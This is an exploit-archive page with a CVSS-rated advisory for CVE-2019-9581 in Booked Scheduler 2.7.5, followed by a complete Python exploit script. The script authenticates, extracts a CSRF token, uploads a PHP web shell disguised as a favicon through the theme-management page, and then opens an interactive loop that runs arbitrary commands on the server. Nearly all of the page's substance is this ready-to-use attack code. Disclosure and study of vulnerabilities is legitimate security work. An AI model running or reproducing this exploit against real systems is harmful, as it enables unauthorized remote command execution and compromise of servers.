Booked Scheduler 2.7.5 Remote Command Execution (RCE) (Authenticated)

2021.12.14
Credit: 0sunday
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated) # Vulnerability founder: AkkuS # Date: 13/12/2021 # Exploit Author: 0sunday # Vendor Homepage: https://www.bookedscheduler.com/ # Software Link: N/A # Version: Booked Scheduler 2.7.5 # Tester on: Kali 2021.2 # CVE: CVE-2019-9581 #!/usr/bin/python3 import sys import requests from random import randint def login(): login_payload = { "email": username, "password": password, "login": "submit", #"language": "en_us" } login_req = request.post( target+"/booked/Web/index.php", login_payload, verify=False, allow_redirects=True ) if login_req.status_code == 200: print ("[+] Logged in successfully.") else: print ("[-] Wrong credentials !") exit() return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1] def upload_shell(csrf): boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999)) _headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept-Language": "en-US,en;q=0.5", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary, "Origin": target, "Connection": "close", "Referer": target + "/booked/Web/admin/manage_theme.php?update" } data = "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n" data += "Content-Type: application/x-php\r\n\n" data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n" data += "-----------------------------"+boundary+"\r\n" data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n" data += csrf + "\r\n" data += "-----------------------------"+boundary+"--\r\n" # In case you need some debugging _proxies = { 'http': 'http://127.0.0.1:8080' } upload_req = request.post( target+"/booked/Web/admin/manage_theme.php?action=update", headers = _headers, data = data #proxies=_proxies ) def shell(): shell_req = request.get(target+"/booked/Web/custom-favicon.php") if shell_req.status_code == 200: print("[+] Uploaded shell successfully") print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=") else: print("[-] Shell uploading failed") exit(1) print() cmd = '' while(cmd != 'exit'): cmd = input("$ ") shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd) print(shell_req.text) if len(sys.argv) != 4: print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password") exit() target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] request = requests.session() csrf = login() upload_shell(csrf) shell()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top